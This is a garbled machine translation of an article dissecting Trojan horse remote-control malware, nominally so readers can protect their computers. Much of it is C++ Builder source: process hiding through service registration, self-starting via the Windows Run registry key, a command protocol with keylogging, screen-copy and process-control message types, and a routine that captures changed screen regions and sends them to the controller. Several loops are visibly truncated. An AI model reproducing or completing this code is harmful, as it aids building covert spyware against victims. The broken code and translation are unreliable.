The technical analysis and research of Trojan horse program

In recent years, the hacker technology has matured unceasingly, has caused the great threat to the network security, one of hacker's main attack means, is uses the Trojan horse technology, penetrates to each other's host system, thus realizes to the remote operation target host. Its destructive power is not to be overlooked, hackers in the end is how to create this kind of destructive Trojan program, the following I on the Trojan source code level of detailed analysis, let us trojan development technology to do a thorough perspective, from the understanding of Trojan technology began, more secure management of their own computer.

1, the category of Trojan horse program

Trojan Program technology development so far, has experienced 4 generations, the first generation, that is, simple password theft, send, etc., nothing special. The second generation of Trojans, in the technology has made great progress, glaciers can be said to be one of the typical domestic Trojan. The third generation of Trojans in the data transfer technology, and did a little improvement, there have been ICMP and other types of Trojans, using malformed messages to pass data, increased the difficulty of killing. The fourth generation of Trojans in the process of hiding, made a big change, using the kernel plug-in embedded mode, the use of remote insertion thread technology, embedded DLL thread. or hook up psapi, realize the hidden Trojan program, even under the Windows nt/2000, have reached a good hiding effect. Believe that the fifth generation of Trojans will soon be compiled out. For more detailed instructions, you can refer to Shotgun's article "uncover the mysterious veil of the Trojan Horse."

2. Hidden Technology of Trojan horse program

Trojan server side, in order to avoid being found, most of the hidden processing, let us look at how the Trojan is to achieve hidden.

When it comes to hiding, first you have to understand three related concepts: processes, threads, and services. Let me explain briefly.

Process: A normal Windows application that, after running, produces a process within the system, with each process corresponding to a different PID (Progress ID, process identifier), the process is allocated a virtual memory space address segment by the system, All relevant program operations will be carried out in this virtual space.

Threads: A process that can exist one or more threads, and threads perform multiple operations synchronously, and generally, threads are independent of each other, and when a thread fails, it does not necessarily cause the entire process to crash.

Service: A process that works in the background and does not appear in the task list when it works as a service, but under Windows nt/2000 you can still check to see if any of the service programs are up and running through the Services Manager.

Want to hide the Trojan server side, can be pseudo hidden, can also be true hide. Pseudo-concealment means that the process of the program still exists, just to let him disappear in the process list. True hiding is to let the program disappear completely, not in a process or service mode of work.

Pseudo-hidden method, is relatively easy to achieve, as long as the Trojan server-side program to register as a service on it, so that the program will disappear from the task list, because the system does not think he is a process, when pressed ctrl+alt+delete, also can not see this program. However, this approach applies only to windows9x systems, and for Windows Nt,windows 2000, you will find services that you have registered with the system through Service Manager. is the pseudo-hidden method really not used under Windows nt/2000? Of course there is a way, that is the API interception technology, by establishing a backstage system hook, intercepting Psapi enumprocessmodules and other related functions to achieve the process and service traversal call control, When the process ID (PID) is detected as the server-side process of Trojan horse directly skip, so that the process of hiding, PowerWord and other software, is the use of a similar method, intercepting the TEXTOUTA,TEXTOUTW function to intercept the screen output, to achieve real-time translation. Again, this method can be used in process hiding.

When the process is really hidden, then this Trojan server part of the program after running, should not have a general process, nor should have services, that is, completely dissolved into the system's core. You might find it strange, just not to say that once an application is running, it must have a process. Indeed, so we can not put him into an application, but instead put him as a thread, a thread from another application, injecting itself into the address space of other applications. And this application for the system, is an absolutely safe program, so that has reached a completely hidden effect, such a result, resulting in the killing of the hacker program more difficult.

For security reasons, I only give a way to implement process pseudo hiding by registering the service program, for more complex, advanced hiding methods, such as remote thread inserting other processes, please refer to Shotgun's article "The Hiding and detection of Trojan horse process under NT system".

WINAPI WinMain (hinstance, HINSTANCE, LPSTR, int)

{

Try

{

DWORD dwversion = GetVersion ();//Get version number of Windows

if (dwversion >= 0x80000000)//Windows 9x hidden Task List

{

Int (CALLBACK *RSP) (Dword,dword);

HInstance dll=loadlibrary ("KERNEL32"). DLL ");//Mount KERNEL32.DLL

rsp= (int (CALLBACK *) (Dword,dword)) GetProcAddress (DLL, "registerserviceprocess");//Find registerserviceprocess Entrance

RSP (null,1);//Registration Service

FreeLibrary (DLL);//Free DLL module

}

}

catch (Exception &exception)//Handling Exception events

{

Handling Exception Events

}

return 0;

}

3, the program's self-loading operation technology

There are many ways to get programs to run themselves, except for the most common method: Loader to Startup group, write program startup path to registry hkey_local_machine/software/microsoft/windows/currentversions/ There are many other ways to run, according to Yagami, and there are dozens of more ways, For example, you can modify the Boot.ini, or through the registration table Input method key value directly hook up, by modifying the Explorer.exe startup parameters, and so on, really can be said to be impossible, the following show a paragraph by modifying the Hkey_local_machine/software /microsoft/windows/currentversions/run the key value to implement a self starter program:

Self-loading section:

HKEY hkey;

ansistring newprogramname=ansistring (SYS) +ansistring ("+pname/" >//) +pname

unsigned long k;

K=reg_opened_existing_key;

RegCreateKeyEx (HKEY_LOCAL_MACHINE,

"software//microsoft//windows//currentversion//run//",

0L,

Null

reg_option_non_volatile,key_all_access| Key_set_value,

Null

&HKEY,&K);

RegSetValueEx (hkey,

"Backgroup",

0,

REG_SZ,

Newprogramname.c_str (),

Newprogramname.length ());

RegCloseKey (HKEY);

if (int (ShellExecute Handle,

"Open",

Newprogramname.c_str (),

Null

Null

sw_hide)) >32)

{

Wantclose=true;

Close ();

}

Else

{

HKEY hkey;

unsigned long k;

K=reg_opened_existing_key;

Long A=regcreatekeyex (HKEY_LOCAL_MACHINE,

"Software//microsoft//windows//currentversion//run",

0,

Null

Reg_option_non_volatile,

Key_set_value,null,

&HKEY,&K);

RegSetValueEx (hkey,

"Backgroup",

0,

REG_SZ,

Programname.c_str (),

Programname.length ());

int num=0;

Char str[20];

DWORD lth=20;

DWORD type;

Char strv[255];

DWORD vl=254;

DWORD Suc;

do{

Suc=regenumvalue (HKEY_LOCAL_MACHINE,

(DWORD) Num,str,

Null

&type,

STRV,&VL);

if (strcmp (str, "bgroup") ==0)

{

DeleteFile (ansistring (STRV));

Regdeletevalue (HKEY_LOCAL_MACHINE, "bgroup");

Break

}

}while (suc== error_success);

RegCloseKey (HKEY);

}

Uninstall code for the self-loading program:

int num;

Char str2[20];

DWORD lth=20;

DWORD type;

Char strv[255];

DWORD vl=254;

DWORD Suc;

do{

Suc=regenumvalue (HKEY_LOCAL_MACHINE,

(DWORD) Num,

Str

Null

&type,

STRV,

&VL);

if (strcmp (str, "bgroup") ==0)

{

DeleteFile (ansistring (STRV));

Regdeletevalue (HKEY_LOCAL_MACHINE, "bgroup");

Break

}

}while (suc== error_success)

HKEY hkey;

unsigned long k;

K=reg_opened_existing_key;

RegCreateKeyEx (HKEY_LOCAL_MACHINE,

"Software//microsoft//windows//currentversion//run",

0,

Null

Reg_option_non_volatile,

Key_set_value,null,

&hkey,

&K);

do{

Suc=regenumvalue (hkey, (DWORD) num,str,if (strcmp (str, "Backgroup") ==0)

{

DeleteFile (ansistring (STRV));

Regdeletevalue (HKEY_LOCAL_MACHINE, "Backgroup");

Break

}

}while (suc== error_success)

RegCloseKey (HKEY);

This can be done by using C + + Builder in the self-loading section, which is simpler:

Tregistry & regKey = *new tregistry ();

Regkey.rootkey=hkey_local_machine;

Regkey.openkey ("Software//microsoft//windows//currentversion//run", true);

if (!regkey.valueexists ("InterBase Server"))

{

Regkey.writestring ("InterBase Server",

"D://program Files//borland//intrbase//bin//ibserver.exe");

}

Regkey.closekey ();

Delete®key;
4, Trojan program to establish the connection of the hidden

There are many kinds of data transfer methods of Trojan Horse, the most common one is the method of transmitting data in tcp,udp, it is usually to use Winsock to establish the connection with the designated port of the target machine, and transmit the data by using the APIs such as send and recv, but because of the poor concealment of this method, It is often easy to see by some tool software, the simplest, such as using the netstat command in the command line state, to view the current active TCP,UDP connection.

C:/Documents and Settings/bigball>netstat-n

Active connections

Proto Local Address Foreign

TCP 192.0.0.9:1032 64.4.13.48:1863 established

TCP 192.0.0.9:1112 61.141.212.95:80 established

TCP 192.0.0.9:1135 202.130.239.223:80 established

TCP 192.0.0.9:1142 202.130.239.223:80 established

TCP 192.0.0.9:1162 192.0.0.8:139 time_wait

TCP 192.0.0.9:1169 202.130.239.159:80 established

TCP 192.0.0.9:1170 202.130.239.133:80 time_wait

C:/Documents and Settings/bigball>netstat-a

Active connections

Proto Local Address Foreign

TCP Liumy:echo liumy:0 Listening

TCP Liumy:discard liumy:0 Listening

TCP Liumy:daytime liumy:0 Listening

TCP LIUMY:QOTD liumy:0 Listening

TCP Liumy:chargen liumy:0 Listening

TCP Liumy:epmap liumy:0 Listening

TCP Liumy:microsoft-ds liumy:0 Listening

TCP liumy:1025 liumy:0 Listening

TCP liumy:1026 liumy:0 Listening

TCP liumy:1031 liumy:0 Listening

TCP liumy:1032 liumy:0 Listening

TCP liumy:1112 liumy:0 Listening

TCP liumy:1135 liumy:0 Listening

TCP liumy:1142 liumy:0 Listening

TCP liumy:1801 liumy:0 Listening

TCP liumy:3372 liumy:0 Listening

TCP liumy:3389 liumy:0 Listening

TCP LIUMY:NETBIOS-SSN liumy:0 Listening

TCP liumy:1028 liumy:0 Listening

TCP liumy:1032 msgr-ns19.msgr.hotmail.com:1863 estab

TCP liumy:1112 szptt61.141.szptt.net.cn:http Establi

TCP liumy:1135 202.130.239.223:http established

TCP liumy:1142 202.130.239.223:http established

TCP liumy:1162 w3i:netbios-ssn time_wait

TCP liumy:1170 202.130.239.133:http time_wait

TCP liumy:2103 liumy:0 Listening

TCP liumy:2105 liumy:0 Listening

TCP liumy:2107 liumy:0 Listening

UDP Liumy:echo *:*

UDP Liumy:discard *:*

UDP Liumy:daytime *:*

UDP LIUMY:QOTD *:*

UDP Liumy:chargen *:*

UDP Liumy:epmap *:*

UDP LIUMY:SNMP *:*

UDP Liumy:microsoft-ds *:*

UDP liumy:1027 *:*

UDP liumy:1029 *:*

UDP liumy:3527 *:*

UDP liumy:4000 *:*

UDP liumy:4001 *:*

UDP liumy:1033 *:*

UDP liumy:1148 *:*

UDP Liumy:netbios-ns *:*

UDP LIUMY:NETBIOS-DGM *:*

UDP LIUMY:ISAKMP *:*

However, hackers still use a variety of means to avoid this reconnaissance, as far as I know there are two kinds of methods, one is the combination of port method, that is, the use of special means, on a port at the same time binding two TCP or UDP connection, which sounds incredible, but in fact it is true, And there has been a similar approach to the use of programs, by putting their own Trojan port on a specific service port above, (such as Port 80 http, who suspect he will be a Trojan horse program.) In order to reach the target of the hidden port. Another way is to use the ICMP (Internet Control message Protocol) protocol to send data, the principle is to modify the structure of the ICMP header, join the Trojan control field, such a Trojan, with many new features, do not occupy the characteristics of the port, Make it difficult for users to detect, at the same time, using ICMP can penetrate some firewalls, thereby increasing the difficulty of prevention. This is because ICMP differs from the TCP,UDP,ICMP application layer that works on the network without using the TCP protocol. For the structure of the network hierarchy, the following illustration shows:

5, send the data organization method

The organization of the data, can be said to be a mathematical problem. The key is to pass data reliability, compressibility, and efficient line. Trojan program, in order to avoid being found, must be a good control of data transmission, a good preparation of the Trojan, often have their own set of transmission protocol, then the program, in the end is how to organize. Here, I'll wrap some of the protocols in an example:

typedef struct{//Definition message structure

Char ip[20];

Char Type; Message type

Char password[20]; Password

int cnum; Message operation number

int Length; Message length

}msg;

#define Msglen sizeof (MSG)

//-------------------------------------------

dialog box Packet definition: dlg_msg_type.h

//-------------------------------------------

Define the following message types:

#define Msgdlgcommon 4//Connection Event

#define MSGDLGSEND 5//Send completion events

Message structure

typedef struct{

Char name[20];//dialog box title

Char msg[256];//dialog box message content

}msgdlguint;

#define Msgdlglen sizeof (MSGDLGUINT)/message unit length

//------------------------------------------

Chat Packet definition: chat_msg_type.h

//------------------------------------------

Define the following message types:

#define Msgchatcommon 0//Connection Event

#define Msgchatconnect 1//Access Event

#define MSGCHATESCEPT 2//End Event

#define MSGCHATRECEIVED 16//Confirmation Dialog received

Message structure

typedef struct{

Char clientname[20];//client a custom name

Message sent by Char msg[256];//

}msgchatuint;

#define Msgchatlen sizeof (MSGCHATUINT)/message unit length

//------------------------------------------

Restart packet definition: reboot_msg_type.h

//------------------------------------------

Define the following message types:

#define MSGREBOOT 15//Restart Event

//------------------------------------------

directory structure Request packet definition: dir_msg_type.h

//------------------------------------------

Define the following message types:

#define MSGGETDIRINFO 17

#define MSGRECEIVEGETDIRINFO 18

typedef struct{

Char dir[4096];//the directory name you want

}msgdiruint;

#define Msgdiruintlen sizeof (Msgdiruint)

MSG for TCP

typedef struct{//Definition message structure

Char stype; Message type

Char spassword[20]; Password

int snum; Message operation number

Char *allmsg;

}smsg;

#define Smsglen sizeof (SMSG)

#define Msglistprogram 19

#define Msgflymouse 21

#define Msggowithmouse 22

#define Msgsavekey 23

#define MSGTRACEKEY 24

#define Msgcopyscreen 25//TCP receive messages, UDP request messages

#define Msgcopywindow 26

//-------------------------

mouse pointer hiding and display control

//-------------------------

#define MSGSETMOUSESTAT 27//Set Message

#define MSGMOUSESTAT 28//Success Message

typedef struct{

BOOL Mouseshow;

}msgsetmousestatuint;

#define Msgsetmousestatuintlen sizeof (Msgsetmousestatuint)

　　

Previous 1 2 3 4 5 6 7 Next

//-------------------------

Taskbar hiding and display control

//-------------------------

#define MSGSETTASKBARSTAT 29//Set Message

#define MSGTASKBARSTAT 30//Success Message

typedef struct{

BOOL Taskshow;

}msgsettaskbarstatuint;

#define Msgsettaskbarstatuintlen sizeof (Msgsettaskbarstatuint)

//-------------------------

Get the machine name

//-------------------------

#define MSGGETNETBIOSNAME 31//Fetch request

#define MSGNETBIOSNAME 32//Loopback machine Name

typedef struct{

Char netbiosname[128];

}msgnetbiosnameuint;

#define Msgnetbiosnameuintlen sizeof (Msgnetbiosnameuint)

//-------------------------

Turn off process changes!

//-------------------------

#define Msgsetprogramclose 33//shutdown request

#define MSGPROGRAMCLOSED 34//Success Message-----

typedef struct{

Char programname[4096];//old Struct:char programname[128];//The name of the window to close

}msgsetprogramcloseuint;

#define Msgsetprogramcloseuintlen sizeof (Msgsetprogramcloseuint)

//-------------------------

Open process Change!

//-------------------------

#define Msgsetprogramopen 20//Open Request

#define MSGPROGRAMOPENED 36//Success Message

typedef struct{

Char programname[4096]; Old Struct:char programname[128];//The name of the program to open

BOOL programshow;//foreground run or background run program (hidden run)

}msgsetprogramopenuint;

#define Msgsetprogramopenuintlen sizeof (Msgsetprogramopenuint)

#define MSGGETHARDWARE 35//Request hardware information (UDP messages) and return hardware information (TCP messages)

As defined above, the TCP and UDP two protocols are used to reduce the probability of TCP connections, which consumes less system resources and is less likely to be detected by the target machine. In many Trojans, there are definitions of passwords similar to those in the above definition, designed to prevent connection requests from non real clients. Snum is the message operation number, its function is to test whether the data is sent, after analysis and know, we are familiar with the OICQ is also using this method to verify the message.

Data protocol is organized, there is a step of the work, that is, the package of data sent, the general method is to press all the data into a void type of data flow, and then send:

Msg *msg=new msg;

Tmemorystream *rdata=new Tmemorystream;

Nmudp1->readstream (RData);

Rdata->read (msg,sizeof (msg));

Udpconnect *udpconnect=new Udpconnect;

NetBIOSname *netbiosname=new NetBIOSname;

if (Msg->cnum==cnumbak)

Return

else{

cnumbak=msg->cnum;

Switch (msg->type)

{

Case 0://msgudpconnect

Rdata->read (udpconnect,sizeof (udpconnect));

CheckUser (Udpconnect->isright);

Break

Case 1:

Rdata->read (netbiosname,sizeof (netbiosname));

Ansistring jqm= "machine name";

jqm+= (ansistring) netbiosname->netbiosname;

Memo2->lines->add (JQM);

Break

}

}

When the server receives the data, the first thing to do is to unpack and restore the void stream as a structured protocol, and here is the case code:

nmudp1->remotehost=fromip;

nmudp1->remoteport=port;

Tmemorystream *rdata=new Tmemorystream;

Nmudp1->readstream (RData);

Msg *msg=new msg;

Rdata->read (msg,sizeof (msg));

if (Msg->cnum==cnumbak)

Return

Else

{

cnumbak=msg->cnum;

Switch (msg->type)

{

Case 0:

CheckUser (Msg->password);

Break

Case 1:

Getnetbiosname ();

Break

Case 2:

Checkhard ();

Break

}

}

In addition, many Trojan programs support the function of screen return, the fundamental principle is to capture the screen, and then back to the client, because the screen data is very large, so many Trojan programs are changed in the screen when the change of the part of the screen, commonly used means is the smallest rectangular method, under the friend "ancient legend" An example of an algorithm:

#define MAXXCOUNT 10//Screen x-directional maximum number of split blocks

#define MAXYCOUNT 5//... Y................

#define DESTNUM 1000//offset detection points per block maximum number

COLORREF Colors[maxxcount][maxycount][destnum];

COLORREF Bakcolors[maxxcount]{maxycount][destnum];

Tpoint Dests[destnum];

int Sw;

int Sh;

int xcount;

int ycount;

int itemwidth;

int itemheight;

int dnum;

int qlity;

After getting the message to execute:

In addition: The packet received in the analysis of Dnum, qlity

Dnum: Number of offset observation points

Qlity: Image Requirements Quality

__fastcall tform1::copyscreen (int dnum,int qlity) {

Itemwidth=sw/xcount;

Itemheight=sh/ycount;

sw=screen->width;

sh=screen->height;

Xcount= (sw>1000)? 8:6;

Ycount= (sh>1000)? 3:2;

for (int num1=0;num1 dests[num1].x=random (itemwidth);

Dests[num1].y=random (ItemHeight);

}

Catchscreen (dnum,qlity);

}

Only execute after receiving the Paint screen message:

Catchscreen (dnum,qlity);

__fastcall tform1::catchscreen (int dnum,int qlity) {

function function: Scan the changed screen area, and cut through the optimized processing, and finally send these area data

Dnum: Offset qlity: Image quality

HDC Dc=getdc (GetDesktopWindow ());

Graphics::tbitmap *bm=new Graphics::tbitmap;

bm->width=sw;

bm->height=sh;

BitBlt (bm->canvas->handle,0,0,sw-1,sh-1,dc,0,0);

int num1,num2,num3;

int nowx,nowy;

BOOL Change;

BOOL Itemchange[maxxcount][maxycount];

for (Num1=0;num1 nowx=itemwidth*num1;

for (num2=0;num2 nowy=itemheight*num2;

Change=false;

for (num3=0;num3 colors[num1][num2][num3]=bm->canvas->pixels[nowx+dests[num3].x][nowy+dests[num3].y];

if (colors[num1][num2][num3]!=bakcolors[num1][num2][num3]) {

BAKCOLORS[NUM1][NUM2][NUM3]=COLORS[NUM1][NUM2][NUM3];

Itemchange[num1][num2]=true;

}

}

}

}

int cnum,maxcnum;

int changednum=0;

Trect *rect;

int num4;

int minsize=10000;

int m;

Trect Minrect;

Graphics::tbitmap *bt2=new Graphics::tbitmap;

Tjpegimage *j=new Tjpegimage;

//************************

j->quality=qlity;

//************************

Copyscreenuint Copyscreen;

Copyscreenitemuint Copyscreenitem;

Tmemorystream *ms=new Tmemorystream;

Ms->write (&tcpmsg,sizeof (tcpmsguint));

Ms->write (&copyscreen,sizeof (copyscreenuint));

do{

For (Num1=0;num1 for (num3=num1+1;num3<=xcount;num3++) {

maxcnum=0;

for (num4=num2+1;num4<=ycount;num4++) {//Traverse all rectangles

Cnum=getchangednum (Trect (NUM1,NUM2,NUM3,NUM4));

if (cnum>maxcnum) maxcnum=cnum;

m= (NUM3-NUM1) * (NUM4-NUM2);

if (2*m-cnum minsize=2*m-cnum;

Minrect=trect (NUM1,NUM2,NUM3,NUM4);

}

}

}

Tmemorystream *ms;

BitBlt (bt2->canvas->handle,0,0,itemwidth-1,itemheight-1,bt->canvas->handle,0,0);

J->assign (BT2);

J->savetostream (MS2);

Copyscreenitem.rect=trect (NUM1,NUM2,NUM3,NUM4);

Copyscreenitem.filetype=jpegfile; Jpegfile is defined as: #define JPEGFILE 1

ms2->position=0;

copyscreenitem.length=ms2->size;

Ms->write (&copyscreenitem,sizeof (screenitemuint));

Ms->copyfrom (ms2,ms2->size);

changednum++;

}while (maxcnum>0);

Tcpmsg.type=msgcopyscreen;

ms->position=0;

Tcpmsg.length=ms->size-sizeof (Tcpmsguint);

Copyscreen.count=changednum;

Ms->write (&tcpmsg,sizeof (tcpmsguint));

Ms->write (&copyscreen,sizeof (copyscreenuint));

ms->position=0;

Sock->sendstream (MS);

}

This program cut the screen into a number of parts, and save the image as JPG format, so that the compression rate becomes very high. This method compresses the processed data, becomes very small, even if the screen does not change the case, the amount of data transmitted is 0, here do not do too much analysis, interested friends, can see more.